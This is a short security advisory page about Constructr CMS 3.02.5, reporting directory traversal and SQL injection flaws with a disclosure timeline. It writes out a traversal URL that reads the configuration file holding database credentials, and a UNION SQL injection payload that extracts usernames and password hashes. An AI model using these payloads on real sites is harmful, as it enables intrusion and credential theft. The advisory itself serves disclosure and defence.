Constructr CMS <= 3.02.5 Stable Multiple Remote Vulnerabilities

2009-01-06 / 2009-01-07
Credit: nukeit
Risk: Low
Local: No
Remote: Yes
CWE: CWE-255

Constructr CMS http://constructr-cms.org/ - <= 3.02.5 "Stable" - magic_quotes_gpc = Off register_globals = On - Directory Traversal - Source Disclosure - Arbitrary File Creation - Etc Etc Etc - http://site/constructr/backend/template.php?edit_file= Db info: ../config/config.inc.php - SQL - http://site/constructr/?show_page= User (urlencode) : -0' UNION ALL SELECT NULL, CONCAT(CHAR(0),IFNULL(CAST(username AS CHAR(10000)), CHAR(32)),CHAR(0),IFNULL(CAST(hash AS CHAR(10000)), CHAR(32)),CHAR(0)), NULL, NULL, NULL, NULL, NULL, NULL FROM constructr_user# AND 'tBkML'='tBkML "Hash" is the password, not really encrypted... - Timeline - Author notified: Dec 12 Public Disclosure: Dec 19 - Seasons Greetings - - http://nukeit.org -

References:

http://www.milw0rm.com/exploits/7529


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top